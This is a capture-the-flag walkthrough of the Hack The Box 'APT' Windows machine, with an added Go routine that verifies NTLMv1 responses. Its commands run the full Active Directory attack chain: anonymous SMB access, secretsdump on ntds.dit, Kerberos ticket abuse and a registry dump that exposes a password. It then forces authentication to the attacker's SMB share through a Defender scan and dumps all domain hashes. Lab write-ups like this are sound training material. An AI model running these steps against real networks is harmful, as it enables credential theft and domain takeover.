## Introduction

- OS: Windows
- Difficulty: Insane
- Points: 50
- Release: 31 Oct 2020
- IP: 10.10.10.213

First, run nmap as usual:
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
135/tcp open  tcpwrapped
```
Only two TCP ports show up over IPv4, so the next step is an IPv6 scan. First obtain the target's IPv6 address with the IOXIDResolver script:
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::3d18:f278:e3b:8a82
```
Add it to /etc/hosts:
```
dead:beef::b885:d62a:d679:573f apt.htb
```
## ipv6 scan

Scanning over IPv6 shows many more ports that may be open, for example 445:
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
...
PORT      STATE         SERVICE      REASON      VERSION
53/udp    open|filtered domain       no-response
67/udp    open|filtered dhcps        no-response
68/udp    open|filtered dhcpc        no-response
69/udp    open|filtered tftp         no-response
123/udp   open|filtered ntp          no-response
135/udp   open|filtered msrpc        no-response
137/udp   open|filtered netbios-ns   no-response
138/udp   open|filtered netbios-dgm  no-response
139/udp   open|filtered netbios-ssn  no-response
161/udp   open|filtered snmp         no-response
162/udp   open|filtered snmptrap     no-response
445/udp   open|filtered microsoft-ds no-response
500/udp   open|filtered isakmp       no-response
514/udp   open|filtered syslog       no-response
520/udp   open|filtered route        no-response
631/udp   open|filtered ipp          no-response
1434/udp  open|filtered ms-sql-m     no-response
1900/udp  open|filtered upnp         no-response
4500/udp  open|filtered nat-t-ike    no-response
49152/udp open|filtered unknown      no-response
...
```
## SMB

The VPN and smbclient must run on the same machine to reach the IPv6 address: with the VPN connected on my Mac, the Kali VM could reach the target over IPv4 but not over IPv6.

Anonymous SMB access works, and there is a backup share:
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
apt.htb is an IPv6 address -- no workgroup available
```
## backup

```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Sep 24 03:30:52 2020
  ..                                  D        0  Thu Sep 24 03:30:52 2020
  backup.zip                          A 10650961  Thu Sep 24 03:30:32 2020

                10357247 blocks of size 4096. 7270207 blocks available
smb: \> get backup.zip
```
The share holds a single zip file, which we download.

Extracting it requires a password.

## zip crack

First crack the archive password:
```
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip

PASSWORD FOUND!!!!: pw == iloveyousomuch
```
## secrets

The archive contains SYSTEM and ntds.dit, so the domain hashes can be extracted offline from those two files:
```shell
cp Active\ Directory/ntds.dit .
cp registry/SYSTEM .
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL > user_pass_and_hash.txt
```
Manually delete the header and footer lines from the txt, keeping only the hash lines.

## users.txt

Extract the usernames:
```shell
# first colon-separated field is the username; sort -u de-duplicates it
awk -F: '{print $1}' users_and_hashes.txt | sort -u > users.txt
```
## kerbrute

Use kerbrute to filter out the valid usernames.

First update hosts again, adding the domain controller and the domain:
```
dead:beef::b885:d62a:d679:573f apt.htb apt.htb.local htb.local
```
Then run kerbrute user enumeration:
```shell
./kerbrute --dc apt.htb.local -d htb.local users.txt
```
There are three valid usernames; the one to focus on is henry.vinson (the enumeration takes quite a while, so be patient).

## henry.vinson

Only this user's hashes are needed, but the hash cannot be used to log in directly:
```
cat users_and_hashes.txt | grep henry.vinson
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
henry.vinson:aes256-cts-hmac-sha1-96:4c0ec4cffc953266ed72d9b565da62115655d2f402416af92e4e76d121663e2f
henry.vinson:aes128-cts-hmac-sha1-96:da63c28166768a2829f00d30ec9fbddd
henry.vinson:des-cbc-md5:80a2c83213b3dfd6
```
## hashes

The hashes obtained earlier can also be processed so that only the LM:NT part remains:
```shell
# drop the Kerberos key lines, keep fields 3 and 4 (LM hash:NT hash)
grep -v -e aes -e des users_and_hashes.txt | awk -F: '{print $3":"$4}' > hashes.txt
```
## getTGT

Trying every username and hash combination with crackmapexec would lock the accounts out, so use getTGT instead to find the valid hash and obtain a TGT (the hash itself cannot log in through evil-winrm):
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Saving ticket in henry.vinson@apt.htb.ccache

export KRB5CCNAME=henry.vinson@apt.htb.ccache
```
## regdump

With a ticket in hand, the remote registry can be dumped (this step also takes a while, so be patient):
```shell
impacket-reg -k apt.htb.local query -keyName HKU -s >> regdump.txt
```
## henry password

Searching the dump for henry turns up a UserName value; looking at the neighbouring values gives the password:
```
cat regdump.txt | grep -n henry
UserName    REG_SZ    henry.vinson_adm
PassWord    REG_SZ    G1
```
## user flag

Then connect with evil-winrm and read user.txt:
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> cd ..
*Evil-WinRM* PS C:\Users\henry.vinson_adm> ls

    Directory: C:\Users\henry.vinson_adm

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/24/2020   9:17 AM                Contacts
d-r---       10/23/2020  11:02 AM                Desktop
d-r---       10/23/2020  10:39 AM                Documents
d-r---        9/24/2020   9:17 AM                Downloads
d-r---        9/24/2020   9:17 AM                Favorites
d-r---        9/24/2020   9:17 AM                Links
d-r---        9/24/2020   9:17 AM                Music
d-r---        9/24/2020   9:17 AM                Pictures
d-r---        9/24/2020   9:17 AM                Saved Games
d-r---        9/24/2020   9:17 AM                Searches
d-r---        9/24/2020   9:17 AM                Videos

*Evil-WinRM* PS C:\Users\henry.vinson_adm> cd Desktop
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Desktop> cat user.txt
da54b84a64d4bf09badf5c4f1dc839c4
```
## Information gathering

The PowerShell history contains a useful clue: it shows that the LAN Manager authentication level was changed. According to the documentation, a value of 2 means client devices use NTLMv1 authentication, and use NTLMv2 session security if the server supports it; domain controllers accept LM, NTLM and NTLMv2 authentication:

```
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type C:\Users\henry.vinson_adm\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
```

Reference: Network security: LAN Manager authentication level

So we can consider using Responder to capture an LM hash: all that is needed is to make the target connect back to us.

## Responder

Here we use Defender on the server: having it scan a file on our SMB share makes the machine authenticate to us, which yields the LM hash:
```
nano /etc/responder/Responder.conf
Challenge = 1122334455667788

sudo responder --lm -I tun0

cd "\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0"
.\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.3\file.exe

[+] Listening for events...
[SMB] NTLMv1 Client   : 10.10.10.213
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash     : APT$::HTB:F9998A19AC07AC9080BFB4D376E2DF7A42EFA694AA779027:F9998A19AC07AC9080BFB4D376E2DF7A42EFA694AA779027:17a961c8b50fdbd7
[*] Skipping previously captured hash for HTB\APT$
[*] Skipping previously captured hash for HTB\APT$
```
## hash crack

The hash must be captured under the manually configured challenge; if the earlier capture used a random challenge, change the config and run it again:
```
APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
```
Submit it directly to the online cracking service (crack.sh):
```
NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384
Key: d167c3238864b12f5f82feae86a7f798
```
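Before relying on the returned key, it is worth checking that it really reproduces the captured response. The following Go program is an added example, not part of the original post; it recomputes the NTLMv1 response from the NT hash and the fixed Responder challenge shown above, using only Go's standard crypto/des, and in doing so shows why the LmCompatibilityLevel value of 2 found in the PowerShell history is so damaging: an NTLMv1 response is just three DES encryptions of the server challenge under fragments of the NT hash, with no client nonce, so a fixed challenge turns every capture into a DES key-recovery problem.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// expandDESKey spreads 56 key bits over 8 bytes, 7 bits per byte; the low
// (parity) bit is cleared because DES ignores it anyway.
func expandDESKey(k7 []byte) []byte {
	k := make([]byte, 8)
	for i := 0; i < 8; i++ {
		var b byte
		if i > 0 {
			b |= k7[i-1] << uint(8-i)
		}
		if i < 7 {
			b |= k7[i] >> uint(i)
		}
		k[i] = b & 0xFE
	}
	return k
}
// NTLMv1Response: the 16-byte NT hash is zero-padded to 21 bytes, cut into
// three 7-byte DES keys, and each key encrypts the 8-byte server challenge.
// No salt, no client nonce: under a fixed challenge it depends only on the hash.
func NTLMv1Response(ntHashHex, challengeHex string) (string, error) {
	nt, err1 := hex.DecodeString(ntHashHex)
	chal, err2 := hex.DecodeString(challengeHex)
	if err1 != nil || err2 != nil || len(nt) != 16 || len(chal) != 8 {
		return "", fmt.Errorf("need a 16-byte NT hash and an 8-byte challenge in hex")
	}
	padded := append(nt, make([]byte, 5)...)
	out := make([]byte, 24)
	for i := 0; i < 3; i++ {
		block, _ := des.NewCipher(expandDESKey(padded[i*7 : i*7+7])) // key is always 8 bytes
		block.Encrypt(out[i*8:i*8+8], chal)
	}
	return strings.ToUpper(hex.EncodeToString(out)), nil
}

// VerifyCrackedKey checks that a key returned by a cracking service reproduces
// the response captured under the given challenge before the key is trusted.
func VerifyCrackedKey(ntHashHex, challengeHex, capturedHex string) bool {
	got, err := NTLMv1Response(ntHashHex, challengeHex)
	return err == nil && got == strings.ToUpper(capturedHex)
}
```

Calling VerifyCrackedKey with the key d167c3238864b12f5f82feae86a7f798, the challenge 1122334455667788 and the captured response 95ACA8C7... from the page should return true; the same check fails for any other NT hash, which is how a wrong or mistyped crack result is caught before it is used.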
## secretsdump

Then combine the recovered key into a full LM:NT hash (the first half is the LM hash of an empty password, i.e. no LM password set), and use that hash to dump the domain secrets:
```
aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798
```
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...
```
## get root

Connect directly with the Administrator hash and read root.txt:
```
┌──(root💀kali)-[~/hackthebox/machine/apt]
└─
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/7/2021   2:57 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e950f2ec0ba974b0e264f13c08473602
```
## Summary of knowledge

- Obtaining the IPv6 address with IOXIDResolver
- Anonymous SMB access
- Cracking a zip archive password
- Extracting hashes with impacket-secretsdump
- User enumeration with kerbrute
- getTGT to find the valid hash and obtain a TGT
- Dumping the registry with impacket-reg
- Responder plus the server's Defender scan of our SMB share to capture an LM hash
- Cracking the hash with crack.sh
- Dumping the Administrator's LM hash with impacket-secretsdump
QQ: 1185151867
twitter: https://twitter.com/fdlucifer11
github: https://github.com/FDlucifer
I'm lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…